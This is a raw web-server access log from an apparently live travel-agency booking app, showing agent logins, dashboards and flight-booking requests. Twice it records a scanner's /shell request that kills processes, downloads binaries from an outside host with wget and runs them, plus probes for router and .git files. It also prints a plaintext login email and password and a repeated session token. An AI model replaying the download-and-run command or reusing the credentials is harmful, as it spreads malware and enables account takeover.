Server is running on port:  \\.\pipe\35645722-f7a2-4299-b2e3-710384c85b4b
[0mGET /robots.txt [33m404[0m 40.752 ms - 149[0m
[0mGET / [32m200[0m 43.053 ms - 31962[0m
[0mGET / [32m200[0m 18.253 ms - 31962[0m
[0mPOST / [33m404[0m 50.785 ms - 140[0m
[0mGET / [32m200[0m 14.596 ms - 31962[0m
[0mGET / [32m200[0m 14.028 ms - 31962[0m
[0mGET / [32m200[0m 13.158 ms - 31962[0m
[0mGET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+vevhea4+ivwebcda7;wget+http:/\/dihvbe.theeyefirewall.su/ivwebcda7;chmod+777+ivwebcda7;./ivwebcda7+jaws;wget+http:/\/dihvbe.theeyefirewall.su/vevhea4;chmod+777+vevhea4;./vevhea4+jaws [33m404[0m 4.031 ms - 144[0m
[0mGET / [32m200[0m 12.888 ms - 31962[0m
[0mGET / [32m200[0m 11.255 ms - 31962[0m
[0mGET /admin/login [32m200[0m 8.534 ms - 1464[0m
[0mGET /assets/index-BISASkG-.css [32m200[0m 3.399 ms - 1817237[0m
[0mGET /assets/index-COGDgJVX.js [32m200[0m 9.766 ms - 10066996[0m
[0mGET /admin/staff-detail [32m200[0m 24.892 ms - 48[0m
[0mGET /admin/count [32m200[0m 31.434 ms - 48[0m
[0mGET /assets/DountApexChart-DzRVNEmi.js [32m200[0m 5.803 ms - 670[0m
[0mGET /assets/tdo-logo-white-2-WwjSyhGE.png [32m200[0m 6.096 ms - 68615[0m
[0mGET /assets/SalesApexChart1-_Vaa40-E.js [32m200[0m 8.377 ms - 1234[0m
[0mGET /assets/fa-solid-900-DByUvYfa.woff2 [32m200[0m 2.692 ms - 126828[0m
[0mGET /assets/la-solid-900-TjMEgv3Q.woff2 [32m200[0m 2.376 ms - 96752[0m
[0mGET /assets/TicketsLineApex-BcPXkoXZ.js [32m200[0m 2.494 ms - 1235[0m
[0mGET /assets/SalesCanvas-DEK2dOnQ.js [32m200[0m 4.898 ms - 761[0m
[0mGET /assets/RevenueLineApex-VHvHtUvy.js [32m200[0m 4.663 ms - 1256[0m
[0mGET /assets/Donut-wxnSUnq4.js [32m200[0m 2.583 ms - 534[0m
[0mGET /assets/pic1-L4nTp4wF.jpg [32m200[0m 4.149 ms - 92904[0m
[0mGET /assets/Login-DiVc4Eyx.js [32m200[0m 3.749 ms - 2458[0m
[0mGET /assets/pic2-4JNJ2tsA.jpg [32m200[0m 2.427 ms - 81387[0m
[0mGET /assets/pic3-CQ61JYnv.jpg [32m200[0m 2.341 ms - 87728[0m
[0mGET /assets/pic4-CfrGDIn8.jpg [32m200[0m 2.321 ms - 84574[0m
[0mGET /assets/pic5-2rAXfMfg.jpg [32m200[0m 2.431 ms - 76156[0m
[0mGET /assets/pattern5-C_fF8CNP.png [32m200[0m 3.696 ms - 8672[0m
[0mGET /assets/tdo-logo-white-BajAumRp.png [32m200[0m 2.304 ms - 137866[0m
[0mGET / [32m200[0m 13.436 ms - 31962[0m
[0mGET /assets/css/fontawesome.min.css [32m200[0m 4.601 ms - 103012[0m
[0mGET /assets/css/boxicons.min.css [32m200[0m 3.877 ms - 84759[0m
[0mGET /assets/css/bootstrap.min.css [32m200[0m 5.325 ms - 299045[0m
[0mGET /assets/css/bootstrap-datepicker.min.css [32m200[0m 6.975 ms - 15734[0m
[0mGET /assets/css/animate.min.css [32m200[0m 5.195 ms - 71764[0m
[0mGET /assets/css/nice-select.css [32m200[0m 3.334 ms - 3070[0m
[0mGET /assets/css/magnific-popup.min.css [32m200[0m 2.449 ms - 5235[0m
[0mGET /assets/css/meanmenu.min.css [32m200[0m 4.512 ms - 2309[0m
[0mGET /assets/css/owl.carousel.min.css [32m200[0m 4.204 ms - 3353[0m
[0mGET /assets/css/style.css [32m200[0m 2.202 ms - 124545[0m
[0mGET /assets/css/responsive.css [32m200[0m 6.385 ms - 16523[0m
[0mGET /assets/css/theme-dark.css [32m200[0m 5.807 ms - 7831[0m
[0mGET /assets/css/style1.css [32m200[0m 3.992 ms - 2046[0m
[0mGET /assets/css/registerAgent.css [32m200[0m 6.197 ms - 20308[0m
[0mGET /assets/img/TDO_DUBAI.png [32m200[0m 2.666 ms - 388600[0m
[0mGET /assets/img/TDO_logo1.png [36m304[0m 2.282 ms - -[0m
[0mGET /assets/images/flights.png [32m200[0m 2.147 ms - 62486[0m
[0mGET /assets/images/hotels.png [32m200[0m 1.998 ms - 42233[0m
[0mGET /assets/images/travel-insurance.png [32m200[0m 2.023 ms - 38063[0m
[0mGET /assets/js/bootstrap-datepicker.min.js [32m200[0m 5.236 ms - 33871[0m
[0mGET /assets/js/bootstrap.bundle.min.js [32m200[0m 5.661 ms - 80672[0m
[0mGET /assets/js/jquery.min.js [32m200[0m 4.829 ms - 87532[0m
[0mGET /assets/js/jquery.magnific-popup.min.js [32m200[0m 14.637 ms - 20216[0m
[0mGET /assets/js/jquery.nice-select.min.js [32m200[0m 9.894 ms - 2942[0m
[0mGET /assets/js/jquery.filterizr.min.js [32m200[0m 2.193 ms - 49179[0m
[0mGET /assets/js/owl.carousel.min.js [32m200[0m 3.223 ms - 44342[0m
[0mGET /assets/js/meanmenu.min.js [32m200[0m 2.723 ms - 5351[0m
[0mGET /assets/js/form-validator.min.js [32m200[0m 2.241 ms - 7729[0m
[0mGET /assets/js/contact-form-script.js [32m200[0m 2.597 ms - 1256[0m
[0mGET /assets/images/bg1.jpg [32m200[0m 2.939 ms - 282103[0m
[0mGET /assets/fonts/boxicons.woff2 [32m200[0m 2.086 ms - 117788[0m
[0mGET /assets/js/jquery.ajaxchimp.min.js [32m200[0m 1.969 ms - 2381[0m
[0mGET /assets/js/script.js [32m200[0m 3.169 ms - 7050[0m
[0mGET /assets/images/visa.png [32m200[0m 1.854 ms - 4221[0m
[0mGET /assets/img/TDO_FooterLogo.jpeg [32m200[0m 1.662 ms - 129992[0m
[0mGET / [32m200[0m 11.515 ms - 31962[0m
[0mGET /assets/css/bootstrap.min.css [32m200[0m 2.084 ms - 299045[0m
[0mGET /assets/css/fontawesome.min.css [32m200[0m 2.229 ms - 103012[0m
[0mGET /assets/css/boxicons.min.css [32m200[0m 2.605 ms - 84759[0m
[0mGET /assets/css/animate.min.css [32m200[0m 4.370 ms - 71764[0m
[0mGET /assets/css/bootstrap-datepicker.min.css [32m200[0m 2.511 ms - 15734[0m
[0mGET /assets/css/nice-select.css [32m200[0m 2.013 ms - 3070[0m
[0mGET /assets/css/owl.carousel.min.css [32m200[0m 2.006 ms - 3353[0m
[0mGET /assets/css/magnific-popup.min.css [32m200[0m 2.095 ms - 5235[0m
[0mGET /assets/css/meanmenu.min.css [32m200[0m 2.030 ms - 2309[0m
[0mGET /assets/css/style.css [32m200[0m 1.844 ms - 124545[0m
[0mGET /assets/css/style1.css [32m200[0m 2.050 ms - 2046[0m
[0mGET /assets/css/theme-dark.css [32m200[0m 2.020 ms - 7831[0m
[0mGET /assets/css/responsive.css [32m200[0m 2.176 ms - 16523[0m
[0mGET /assets/css/registerAgent.css [32m200[0m 1.825 ms - 20308[0m
[0mGET /assets/img/TDO_DUBAI.png [32m200[0m 2.122 ms - 388600[0m
[0mGET /assets/img/TDO_logo1.png [32m200[0m 1.834 ms - 391964[0m
[0mGET /assets/images/flights.png [32m200[0m 2.097 ms - 62486[0m
[0mGET /assets/images/hotels.png [32m200[0m 2.084 ms - 42233[0m
[0mGET /assets/images/travel-insurance.png [32m200[0m 2.073 ms - 38063[0m
[0mGET /assets/js/jquery.min.js [32m200[0m 2.074 ms - 87532[0m
[0mGET /assets/js/bootstrap.bundle.min.js [32m200[0m 2.406 ms - 80672[0m
[0mGET /assets/js/bootstrap-datepicker.min.js [32m200[0m 2.034 ms - 33871[0m
[0mGET /assets/js/jquery.nice-select.min.js [32m200[0m 4.207 ms - 2942[0m
[0mGET /assets/js/jquery.magnific-popup.min.js [32m200[0m 2.147 ms - 20216[0m
Connected to MySQL database
{ Email: 'parasmarwaha369@gmail.com', Password: 'Paras85560@' }
[0mGET /assets/js/jquery.filterizr.min.js [32m200[0m 1.819 ms - 49179[0m
[0mGET /assets/js/owl.carousel.min.js [32m200[0m 1.923 ms - 44342[0m
[0mGET /assets/js/meanmenu.min.js [32m200[0m 1.888 ms - 5351[0m
[0mPOST /agent-login [32m200[0m 553.322 ms - 454[0m
[0mGET /assets/js/form-validator.min.js [32m200[0m 2.152 ms - 7729[0m
[0mGET /assets/js/contact-form-script.js [32m200[0m 3.598 ms - 1256[0m
[0mGET /assets/js/jquery.ajaxchimp.min.js [32m200[0m 2.101 ms - 2381[0m
[0mGET /assets/images/visa.png [32m200[0m 3.021 ms - 4221[0m
[0mGET /assets/js/script.js [32m200[0m 2.201 ms - 7050[0m
[0mGET /assets/img/TDO_FooterLogo.jpeg [32m200[0m 2.117 ms - 129992[0m
[0mGET /assets/fonts/boxicons.woff2 [32m200[0m 3.014 ms - 117788[0m
[0mGET /assets/images/bg1.jpg [32m200[0m 2.800 ms - 282103[0m
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIxNywiYWdlbnRFbWFpbCI6InBhcmFzbWFyd2FoYTM2OUBnbWFpbC5jb20iLCJ1c2VyVHlwZSI6IlRyYXZlbCBhZ2VudCIsImFnZW50SWQiOjIxNywiYWdlbnROYW1lIjoiUEFSQVMgTUFSV0FIQSIsImlhdCI6MTczNjkxNzk4NSwiZXhwIjoxNzM3MDA0Mzg1fQ.JiY2jpp_DUfjETz06yN8BHVrmAUS4myAyNer4JNyqPo
[0mGET /agent-dashboard [32m200[0m 26.851 ms - 36098[0m
[0mGET /assets2/css/style.css [36m304[0m 2.689 ms - -[0m
[0mGET /assets2/vendor/bootstrap-select/css/bootstrap-select.min.css [32m200[0m 5.113 ms - 10722[0m
[0mGET /assets2/vendor/datatables/responsive/responsive.css [36m304[0m 3.692 ms - -[0m
[0mGET /assets2/vendor/chartist/css/chartist.min.css [36m304[0m 3.346 ms - -[0m
[0mGET /assets2/vendor/bootstrap-datetimepicker/css/bootstrap-datetimepicker.min.css [36m304[0m 7.564 ms - -[0m
[0mGET /assets2/vendor/datatables/css/jquery.dataTables.min.css [36m304[0m 7.252 ms - -[0m
[0mGET /assets/img/TDO_logo1.png [36m304[0m 1.150 ms - -[0m
[0mGET /assets2/flights/js/lightbox.min.js [36m304[0m 2.821 ms - -[0m
[0mGET /assets2/flights/js/flatpickr.js [36m304[0m 2.398 ms - -[0m
[0mGET /assets2/flights/js/jquery.min.js [36m304[0m 4.030 ms - -[0m
[0mGET /assets2/flights/js/flickity.pkgd.min.js [36m304[0m 2.356 ms - -[0m
[0mGET /assets2/flights/js/rangeslider.js [36m304[0m 5.542 ms - -[0m
[0mGET /assets2/icons/themify-icons/css/themify-icons.css [36m304[0m 1.083 ms - -[0m
[0mGET /assets2/icons/fontawesome/css/all.min.css [36m304[0m 1.219 ms - -[0m
[0mGET /assets2/icons/material-design-iconic-font/css/materialdesignicons.min.css [36m304[0m 1.689 ms - -[0m
[0mGET /assets2/icons/flaticon/flaticon.css [36m304[0m 1.315 ms - -[0m
[0mGET /assets2/icons/line-awesome/css/line-awesome.min.css [36m304[0m 1.675 ms - -[0m
[0mGET /assets2/icons/flaticon_1/flaticon_1.css [36m304[0m 1.310 ms - -[0m
[0mGET /assets2/vendor/metismenu/css/metisMenu.min.css [36m304[0m 1.075 ms - -[0m
[0mGET /assets2/flights/js/addadult.js [36m304[0m 1.121 ms - -[0m
[0mGET /assets2/vendor/global/global.min.js [36m304[0m 1.015 ms - -[0m
[0mGET /assets2/flights/js/custom.js [36m304[0m 2.722 ms - -[0m
[0mGET /assets2/js/custom.min.js [36m304[0m 2.337 ms - -[0m
[0mGET /assets2/js/deznav-init.js [36m304[0m 1.977 ms - -[0m
[0mGET /assets2/flights/js/select2.min.js [36m304[0m 1.186 ms - -[0m
[0mGET /assets2/vendor/chartjs/chart.bundle.min.js [36m304[0m 1.179 ms - -[0m
[0mGET /assets2/vendor/bootstrap-datetimepicker/js/moment.js [36m304[0m 1.972 ms - -[0m
[0mGET /assets2/vendor/bootstrap-datetimepicker/js/bootstrap-datetimepicker.min.js [36m304[0m 1.501 ms - -[0m
[0mGET /assets2/vendor/peity/jquery.peity.min.js [36m304[0m 1.789 ms - -[0m
[0mGET /assets2/vendor/apexchart/apexchart.js [36m304[0m 1.388 ms - -[0m
[0mGET /assets2/js/dashboard/dashboard-1.js [36m304[0m 1.180 ms - -[0m
[0mGET /assets2/vendor/datatables/js/jquery.dataTables.min.js [36m304[0m 1.213 ms - -[0m
[0mGET /assets2/vendor/datatables/responsive/responsive.js [36m304[0m 1.188 ms - -[0m
[0mGET /assets2/js/plugins-init/datatables.init.js [36m304[0m 2.374 ms - -[0m
[0mGET /assets2/icons/fontawesome/webfonts/fa-solid-900.woff2 [36m304[0m 1.143 ms - -[0m
[0mGET /assets2/icons/flaticon_1/Flaticon_1.woff2 [36m304[0m 1.183 ms - -[0m
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIxNywiYWdlbnRFbWFpbCI6InBhcmFzbWFyd2FoYTM2OUBnbWFpbC5jb20iLCJ1c2VyVHlwZSI6IlRyYXZlbCBhZ2VudCIsImFnZW50SWQiOjIxNywiYWdlbnROYW1lIjoiUEFSQVMgTUFSV0FIQSIsImlhdCI6MTczNjkxNzk4NSwiZXhwIjoxNzM3MDA0Mzg1fQ.JiY2jpp_DUfjETz06yN8BHVrmAUS4myAyNer4JNyqPo
Connected to MySQL database
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIxNywiYWdlbnRFbWFpbCI6InBhcmFzbWFyd2FoYTM2OUBnbWFpbC5jb20iLCJ1c2VyVHlwZSI6IlRyYXZlbCBhZ2VudCIsImFnZW50SWQiOjIxNywiYWdlbnROYW1lIjoiUEFSQVMgTUFSV0FIQSIsImlhdCI6MTczNjkxNzk4NSwiZXhwIjoxNzM3MDA0Mzg1fQ.JiY2jpp_DUfjETz06yN8BHVrmAUS4myAyNer4JNyqPo
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIxNywiYWdlbnRFbWFpbCI6InBhcmFzbWFyd2FoYTM2OUBnbWFpbC5jb20iLCJ1c2VyVHlwZSI6IlRyYXZlbCBhZ2VudCIsImFnZW50SWQiOjIxNywiYWdlbnROYW1lIjoiUEFSQVMgTUFSV0FIQSIsImlhdCI6MTczNjkxNzk4NSwiZXhwIjoxNzM3MDA0Mzg1fQ.JiY2jpp_DUfjETz06yN8BHVrmAUS4myAyNer4JNyqPo
25
Connected to MySQL database
[0mGET /getBalance [36m304[0m 66.163 ms - -[0m
[0mGET /getAgentData [36m304[0m 65.504 ms - -[0m
Connected to MySQL database
[0mGET /assets2/images/demo_avatar.png [36m304[0m 1.191 ms - -[0m
[0mGET /flight-search [32m200[0m 347.363 ms - 146[0m
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIxNywiYWdlbnRFbWFpbCI6InBhcmFzbWFyd2FoYTM2OUBnbWFpbC5jb20iLCJ1c2VyVHlwZSI6IlRyYXZlbCBhZ2VudCIsImFnZW50SWQiOjIxNywiYWdlbnROYW1lIjoiUEFSQVMgTUFSV0FIQSIsImlhdCI6MTczNjkxNzk4NSwiZXhwIjoxNzM3MDA0Mzg1fQ.JiY2jpp_DUfjETz06yN8BHVrmAUS4myAyNer4JNyqPo
[0mGET /flights/viewHoldBookings [32m200[0m 24.785 ms - 39591[0m
[0mGET /assets2/vendor/bootstrap-select/css/bootstrap-select.min.css [36m304[0m 1.111 ms - -[0m
[0mGET /assets2/vendor/bootstrap-datetimepicker/css/bootstrap-datetimepicker.min.css [36m304[0m 2.156 ms - -[0m
[0mGET /assets2/css/style.css [36m304[0m 4.459 ms - -[0m
[0mGET /assets2/vendor/datatables/responsive/responsive.css [36m304[0m 3.588 ms - -[0m
[0mGET /assets2/vendor/chartist/css/chartist.min.css [36m304[0m 3.186 ms - -[0m
[0mGET /assets2/vendor/datatables/css/jquery.dataTables.min.css [36m304[0m 4.658 ms - -[0m
[0mGET /assets/img/TDO_logo1.png [36m304[0m 1.107 ms - -[0m
[0mGET /assets2/flights/js/jquery.min.js [36m304[0m 1.128 ms - -[0m
[0mGET /assets2/flights/js/flatpickr.js [36m304[0m 1.128 ms - -[0m
[0mGET /assets2/flights/js/flickity.pkgd.min.js [36m304[0m 2.316 ms - -[0m
[0mGET /assets2/flights/js/rangeslider.js [36m304[0m 2.135 ms - -[0m
[0mGET /assets2/flights/js/lightbox.min.js [36m304[0m 1.582 ms - -[0m
[0mGET /assets2/icons/fontawesome/css/all.min.css [36m304[0m 1.837 ms - -[0m
[0mGET /assets2/icons/material-design-iconic-font/css/materialdesignicons.min.css [36m304[0m 1.528 ms - -[0m
[0mGET /assets2/icons/themify-icons/css/themify-icons.css [36m304[0m 1.898 ms - -[0m
[0mGET /assets2/icons/line-awesome/css/line-awesome.min.css [36m304[0m 1.477 ms - -[0m
[0mGET /assets2/icons/flaticon_1/flaticon_1.css [36m304[0m 1.069 ms - -[0m
[0mGET /assets2/icons/flaticon/flaticon.css [36m304[0m 1.019 ms - -[0m
[0mGET /assets2/vendor/metismenu/css/metisMenu.min.css [36m304[0m 2.006 ms - -[0m
[0mGET /assets2/flights/js/addadult.js [36m304[0m 1.551 ms - -[0m
[0mGET /assets2/vendor/global/global.min.js [36m304[0m 2.923 ms - -[0m
[0mGET /assets2/js/custom.min.js [36m304[0m 2.518 ms - -[0m
[0mGET /assets2/flights/js/custom.js [36m304[0m 2.038 ms - -[0m
[0mGET /assets2/js/deznav-init.js [36m304[0m 3.468 ms - -[0m
[0mGET /assets2/flights/js/select2.min.js [36m304[0m 1.155 ms - -[0m
[0mGET /assets2/vendor/chartjs/chart.bundle.min.js [36m304[0m 1.127 ms - -[0m
[0mGET /assets2/icons/fontawesome/webfonts/fa-solid-900.woff2 [36m304[0m 2.894 ms - -[0m
[0mGET /assets2/vendor/bootstrap-datetimepicker/js/bootstrap-datetimepicker.min.js [36m304[0m 2.395 ms - -[0m
[0mGET /assets2/vendor/bootstrap-datetimepicker/js/moment.js [36m304[0m 2.010 ms - -[0m
[0mGET /assets2/vendor/peity/jquery.peity.min.js [36m304[0m 2.289 ms - -[0m
[0mGET /assets2/icons/flaticon_1/Flaticon_1.woff2 [36m304[0m 1.175 ms - -[0m
[0mGET /assets2/vendor/apexchart/apexchart.js [36m304[0m 1.008 ms - -[0m
[0mGET /assets2/vendor/datatables/js/jquery.dataTables.min.js [36m304[0m 2.693 ms - -[0m
[0mGET /assets2/vendor/datatables/responsive/responsive.js [36m304[0m 2.273 ms - -[0m
[0mGET /assets2/js/dashboard/dashboard-1.js [36m304[0m 1.908 ms - -[0m
[0mGET /assets2/js/plugins-init/datatables.init.js [36m304[0m 0.960 ms - -[0m
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIxNywiYWdlbnRFbWFpbCI6InBhcmFzbWFyd2FoYTM2OUBnbWFpbC5jb20iLCJ1c2VyVHlwZSI6IlRyYXZlbCBhZ2VudCIsImFnZW50SWQiOjIxNywiYWdlbnROYW1lIjoiUEFSQVMgTUFSV0FIQSIsImlhdCI6MTczNjkxNzk4NSwiZXhwIjoxNzM3MDA0Mzg1fQ.JiY2jpp_DUfjETz06yN8BHVrmAUS4myAyNer4JNyqPo
Connected to MySQL database
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIxNywiYWdlbnRFbWFpbCI6InBhcmFzbWFyd2FoYTM2OUBnbWFpbC5jb20iLCJ1c2VyVHlwZSI6IlRyYXZlbCBhZ2VudCIsImFnZW50SWQiOjIxNywiYWdlbnROYW1lIjoiUEFSQVMgTUFSV0FIQSIsImlhdCI6MTczNjkxNzk4NSwiZXhwIjoxNzM3MDA0Mzg1fQ.JiY2jpp_DUfjETz06yN8BHVrmAUS4myAyNer4JNyqPo
Connected to MySQL database
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIxNywiYWdlbnRFbWFpbCI6InBhcmFzbWFyd2FoYTM2OUBnbWFpbC5jb20iLCJ1c2VyVHlwZSI6IlRyYXZlbCBhZ2VudCIsImFnZW50SWQiOjIxNywiYWdlbnROYW1lIjoiUEFSQVMgTUFSV0FIQSIsImlhdCI6MTczNjkxNzk4NSwiZXhwIjoxNzM3MDA0Mzg1fQ.JiY2jpp_DUfjETz06yN8BHVrmAUS4myAyNer4JNyqPo
Connected to MySQL database
25
[0mGET /getAgentData [36m304[0m 28.828 ms - -[0m
[0mPOST /flights/holdBookings [32m200[0m 61.560 ms - 36354[0m
[0mGET /assets2/images/demo_avatar.png [36m304[0m 1.171 ms - -[0m
[0mGET /getBalance [36m304[0m 280.110 ms - -[0m
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIxNywiYWdlbnRFbWFpbCI6InBhcmFzbWFyd2FoYTM2OUBnbWFpbC5jb20iLCJ1c2VyVHlwZSI6IlRyYXZlbCBhZ2VudCIsImFnZW50SWQiOjIxNywiYWdlbnROYW1lIjoiUEFSQVMgTUFSV0FIQSIsImlhdCI6MTczNjkxNzk4NSwiZXhwIjoxNzM3MDA0Mzg1fQ.JiY2jpp_DUfjETz06yN8BHVrmAUS4myAyNer4JNyqPo
{ id: '20250107163609153172_36d42945-c69b-4c44-bf2f-235bbc5aed34' }
[0mGET /flights/hold_booking_details/20250107163609153172_36d42945-c69b-4c44-bf2f-235bbc5aed34 [32m200[0m 33.843 ms - 74706[0m
[0mGET /assets2/vendor/bootstrap-select/css/bootstrap-select.min.css [36m304[0m 1.128 ms - -[0m
[0mGET /assets2/vendor/datatables/responsive/responsive.css [36m304[0m 3.806 ms - -[0m
[0mGET /assets2/vendor/datatables/css/jquery.dataTables.min.css [36m304[0m 3.410 ms - -[0m
[0mGET /assets2/css/style.css [36m304[0m 3.035 ms - -[0m
[0mGET /assets2/vendor/bootstrap-datetimepicker/css/bootstrap-datetimepicker.min.css [36m304[0m 2.680 ms - -[0m
[0mGET /assets2/vendor/chartist/css/chartist.min.css [36m304[0m 5.960 ms - -[0m
[0mGET /assets/img/TDO_logo1.png [36m304[0m 1.115 ms - -[0m
[0mGET /assets2/flights/js/jquery.min.js [36m304[0m 3.601 ms - -[0m
[0mGET /assets2/flights/js/rangeslider.js [36m304[0m 3.117 ms - -[0m
[0mGET /assets2/flights/js/flatpickr.js [36m304[0m 2.703 ms - -[0m
[0mGET /assets2/flights/js/flickity.pkgd.min.js [36m304[0m 3.310 ms - -[0m
[0mGET /assets2/flights/js/lightbox.min.js [36m304[0m 5.384 ms - -[0m
[0mGET /assets2/icons/fontawesome/css/all.min.css [36m304[0m 1.096 ms - -[0m
[0mGET /assets2/icons/themify-icons/css/themify-icons.css [36m304[0m 4.610 ms - -[0m
[0mGET /assets2/icons/flaticon/flaticon.css [36m304[0m 3.844 ms - -[0m
[0mGET /assets2/icons/line-awesome/css/line-awesome.min.css [36m304[0m 3.515 ms - -[0m
[0mGET /assets2/icons/material-design-iconic-font/css/materialdesignicons.min.css [36m304[0m 6.228 ms - -[0m
[0mGET /assets2/icons/flaticon_1/flaticon_1.css [36m304[0m 5.611 ms - -[0m
[0mGET /assets2/vendor/metismenu/css/metisMenu.min.css [36m304[0m 1.186 ms - -[0m
[0mGET /assets2/flights/js/custom.js [36m304[0m 3.004 ms - -[0m
[0mGET /assets2/vendor/global/global.min.js [36m304[0m 2.414 ms - -[0m
[0mGET /assets2/flights/js/addadult.js [36m304[0m 2.030 ms - -[0m
[0mGET /assets2/js/deznav-init.js [36m304[0m 1.864 ms - -[0m
[0mGET /assets2/js/custom.min.js [36m304[0m 1.392 ms - -[0m
[0mGET /assets2/flights/js/select2.min.js [36m304[0m 1.204 ms - -[0m
[0mGET /assets2/vendor/chartjs/chart.bundle.min.js [36m304[0m 2.002 ms - -[0m
[0mGET /assets2/vendor/bootstrap-datetimepicker/js/moment.js [36m304[0m 1.510 ms - -[0m
[0mGET /assets2/vendor/bootstrap-datetimepicker/js/bootstrap-datetimepicker.min.js [36m304[0m 3.680 ms - -[0m
[0mGET /assets2/vendor/apexchart/apexchart.js [36m304[0m 1.761 ms - -[0m
[0mGET /assets2/vendor/peity/jquery.peity.min.js [36m304[0m 1.365 ms - -[0m
[0mGET /assets2/icons/fontawesome/webfonts/fa-solid-900.woff2 [36m304[0m 1.216 ms - -[0m
[0mGET /assets2/icons/flaticon_1/Flaticon_1.woff2 [36m304[0m 2.022 ms - -[0m
[0mGET /assets2/js/dashboard/dashboard-1.js [36m304[0m 1.478 ms - -[0m
[0mGET /assets2/vendor/datatables/js/jquery.dataTables.min.js [36m304[0m 1.026 ms - -[0m
[0mGET /assets2/vendor/datatables/responsive/responsive.js [36m304[0m 1.228 ms - -[0m
[0mGET /assets2/js/plugins-init/datatables.init.js [36m304[0m 2.371 ms - -[0m
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIxNywiYWdlbnRFbWFpbCI6InBhcmFzbWFyd2FoYTM2OUBnbWFpbC5jb20iLCJ1c2VyVHlwZSI6IlRyYXZlbCBhZ2VudCIsImFnZW50SWQiOjIxNywiYWdlbnROYW1lIjoiUEFSQVMgTUFSV0FIQSIsImlhdCI6MTczNjkxNzk4NSwiZXhwIjoxNzM3MDA0Mzg1fQ.JiY2jpp_DUfjETz06yN8BHVrmAUS4myAyNer4JNyqPo
Connected to MySQL database
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIxNywiYWdlbnRFbWFpbCI6InBhcmFzbWFyd2FoYTM2OUBnbWFpbC5jb20iLCJ1c2VyVHlwZSI6IlRyYXZlbCBhZ2VudCIsImFnZW50SWQiOjIxNywiYWdlbnROYW1lIjoiUEFSQVMgTUFSV0FIQSIsImlhdCI6MTczNjkxNzk4NSwiZXhwIjoxNzM3MDA0Mzg1fQ.JiY2jpp_DUfjETz06yN8BHVrmAUS4myAyNer4JNyqPo
Connected to MySQL database
25
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIxNywiYWdlbnRFbWFpbCI6InBhcmFzbWFyd2FoYTM2OUBnbWFpbC5jb20iLCJ1c2VyVHlwZSI6IlRyYXZlbCBhZ2VudCIsImFnZW50SWQiOjIxNywiYWdlbnROYW1lIjoiUEFSQVMgTUFSV0FIQSIsImlhdCI6MTczNjkxNzk4NSwiZXhwIjoxNzM3MDA0Mzg1fQ.JiY2jpp_DUfjETz06yN8BHVrmAUS4myAyNer4JNyqPo
Connected to MySQL database
[0mGET /getBalance [36m304[0m 50.509 ms - -[0m
[0mGET /getAgentData [36m304[0m 64.700 ms - -[0m
[0mPOST /flights/getTicketDetails [32m200[0m 47.095 ms - 12533[0m
[0mGET /assets2/images/demo_avatar.png [36m304[0m 1.017 ms - -[0m
[0mGET /cgi-bin/luci/;stok=/locale?form=country&operation=read [33m404[0m 3.311 ms - 165[0m
[0mGET / [32m200[0m 14.029 ms - 31962[0m
[0mGET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+vevhea4+ivwebcda7;wget+http:/\/dihvbe.theeyefirewall.su/ivwebcda7;chmod+777+ivwebcda7;./ivwebcda7+jaws;wget+http:/\/dihvbe.theeyefirewall.su/vevhea4;chmod+777+vevhea4;./vevhea4+jaws [33m404[0m 2.854 ms - 144[0m
[0mGET / [32m200[0m 12.751 ms - 31962[0m
[0mGET / [32m200[0m 12.059 ms - 31962[0m
[0mGET / [32m200[0m 12.657 ms - 31962[0m
[0mGET / [32m200[0m 14.077 ms - 31962[0m
[0mGET / [32m200[0m 12.452 ms - 31962[0m
[0mGET / [32m200[0m 10.794 ms - 31962[0m
[0mGET / [32m200[0m 12.739 ms - 31962[0m
[0mGET / [32m200[0m 12.338 ms - 31962[0m
[0mGET / [32m200[0m 11.938 ms - 31962[0m
[0mGET / [32m200[0m 10.968 ms - 31962[0m
[0mGET / [32m200[0m 11.840 ms - 31962[0m
[0mGET / [32m200[0m 11.673 ms - 31962[0m
[0mGET / [32m200[0m 10.531 ms - 31962[0m
[0mGET /assets/img/img_1.png [32m200[0m 4.061 ms - 4486[0m
[0mGET / [32m200[0m 10.399 ms - 31962[0m
[0mGET / [32m200[0m 12.214 ms - 31962[0m
[0mGET / [32m200[0m 12.009 ms - 31962[0m
[0mGET / [32m200[0m 10.596 ms - 31962[0m
[0mGET / [32m200[0m 12.069 ms - 31962[0m
[0mGET / [32m200[0m 12.212 ms - 31962[0m
[0mGET / [32m200[0m 10.713 ms - 31962[0m
[0mGET / [32m200[0m 10.895 ms - 31962[0m
[0mGET /.git/config [33m404[0m 2.849 ms - 150[0m
[0mGET / [32m200[0m 12.335 ms - 31962[0m
[0mGET / [32m200[0m 11.783 ms - 31962[0m
[0mGET / [32m200[0m 9.951 ms - 31962[0m
[0mGET / [32m200[0m 10.417 ms - 31962[0m
[0mGET / [32m200[0m 12.522 ms - 31962[0m
[0mGET / [32m200[0m 12.118 ms - 31962[0m
[0mGET / [32m200[0m 10.578 ms - 31962[0m
[0mGET / [32m200[0m 11.909 ms - 31962[0m
[0mGET / [32m200[0m 12.621 ms - 31962[0m
